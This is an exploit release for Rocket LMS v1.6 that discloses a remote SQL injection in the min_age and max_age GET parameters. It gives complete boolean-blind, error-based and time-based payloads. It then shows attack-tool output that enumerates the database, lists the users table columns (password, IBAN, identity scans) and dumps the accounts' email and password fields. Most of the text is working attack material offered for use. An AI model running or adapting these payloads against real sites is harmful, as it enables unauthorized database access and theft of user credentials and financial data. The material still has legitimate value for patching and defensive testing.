`C r a C k E r
T H E C R A C K O F E T E R N A L M I G H T
From The Ashes and Dust Rises An Unimaginable crack....

[ Exploits ]

Author    : CraCkEr
Website   : rocket-soft.org
Vendor    : RocketSoft
Software  : Rocket LMS v 1.6
Vuln Type : Remote SQL Injection
Method    : GET
Impact    : Database Access

Rocket LMS - Learning Management System is an online course marketplace with a pile of features that helps you to run your online education business easily

B4nks-NET irc.b4nks.tk #unix

Release Notes:
Typically used for remotely exploitable vulnerabilities that can lead to system compromise.

Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
Ivo @palaziv
CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2022
GET parameter 'min_age' is vulnerable
---
Parameter: min_age (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
---
GET parameter 'max_age' is vulnerable
---
Parameter: max_age (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=
---
[+] Starting the Attack
[INFO] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 7.4.30
back-end DBMS: MySQL >= 5.6
current database: 'admin_learn'
[INFO] fetching tables for database: 'admin_learn'
Database: admin_learn
[184 tables]
[INFO] fetching columns for table 'users' in database 'admin_learn'
Database: admin_learn
Table: users
[49 columns]
+--------------------+-------------------------------------+
| Column | Type |
+--------------------+-------------------------------------+
| language | varchar(255) |
| about | text |
| access_content | tinyint(1) |
| account_id | varchar(128) |
| account_type | varchar(128) |
| address | varchar(255) |
| affiliate | tinyint(1) |
| avatar | varchar(255) |
| avatar_settings | varchar(255) |
| ban | tinyint(1) |
| ban_end_at | int(10) unsigned |
| ban_start_at | int(10) unsigned |
| bio | varchar(128) |
| can_create_store | tinyint(1) |
| certificate | varchar(128) |
| city_id | int(10) unsigned |
| commission | int(10) unsigned |
| country_id | int(10) unsigned |
| cover_img | varchar(255) |
| created_at | int(11) |
| deleted_at | int(11) |
| district_id | int(10) unsigned |
| email | varchar(255) |
| facebook_id | varchar(255) |
| financial_approval | tinyint(1) |
| full_name | varchar(128) |
| google_id | varchar(255) |
| headline | varchar(255) |
| iban | varchar(128) |
| id | int(10) unsigned |
| identity_scan | varchar(128) |
| level_of_training | bit(3) |
| location | point |
| meeting_type | enum('all','in_person','online') |
| mobile | varchar(32) |
| newsletter | tinyint(1) |
| offline | tinyint(1) |
| offline_message | text |
| organ_id | int(11) |
| password | varchar(255) |
| province_id | int(10) unsigned |
| public_message | tinyint(1) |
| remember_token | varchar(255) |
| role_id | int(10) unsigned |
| role_name | varchar(64) |
| status | enum('active','pending','inactive') |
| timezone | varchar(255) |
| updated_at | int(11) |
| verified | tinyint(1) |
+--------------------+-------------------------------------+
[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'
Database: admin_learn
Table: users
[4 entries]
[-] Done
`